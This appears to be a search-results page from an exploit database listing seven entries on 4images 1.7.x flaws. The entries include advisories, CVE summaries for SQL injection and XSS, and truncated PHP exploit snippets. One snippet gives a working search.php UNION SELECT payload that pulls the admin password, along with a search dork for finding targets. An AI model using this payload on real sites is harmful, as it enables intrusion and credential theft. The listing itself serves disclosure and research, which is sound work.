7 matches found
SQL injection and Path Disclosure Auth Bypass in 4images 1.7.X
-----------Summary----------- eVuln ID: 200 Software: "Powered by 4images" Vendor: PHP Web Scripts Version: 4images 1.7.X dork: "Powered by 4images" Critical Level: medium Type: SQL injection and Path Disclosure Status: Unpatched. No reply from developers PoC: Available Solution: Not available...
CVE-2006-5236
SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the searchuser parameter...
4images-sql.txt
!/usr/bin/php ", $page die"Failed.."; else die"Table Prefix: $tab\n"; if$argv4 $pipe = fsockopen$argv1,80; if!$pipe die"Cannot connect to host."...
4images 1.7.x (search.php) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/php ?php / 4images 1.7.x Remote SQL Injection Vulnerability Usage: php file.php host path table prefix user id Googledork "powered by 4images 1.7.x" Vulnerability: Disfigure Research: h3llfyr3 Coding: Synsta. PoC:...
4images 1.7.x (search.php) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ======================================================= 4images 1.7.x search.php Remote SQL Injection Exploit ======================================================= !/usr/bin/php...
4Images 1.7.x - 'search.php' SQL Injection
!/usr/bin/php //search.php?searchuser=x%2527%20union%20select%20userpassword%20from%204imagesusers%20where%20username=%2527ADMIN w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path options table prefix user id\n Options: -d: Determine table prefix\n Example: php $argv0 domain.com...
CVE-2006-2011
The CVE-2006-2011 issue affects 4images 1.7 and earlier, where a Cross-site scripting (XSS) flaw exists in member.php. The vulnerability is triggered via the nickname in register.php, likely involving the user_name parameter, allowing remote attackers to inject arbitrary web script or HTML. The N...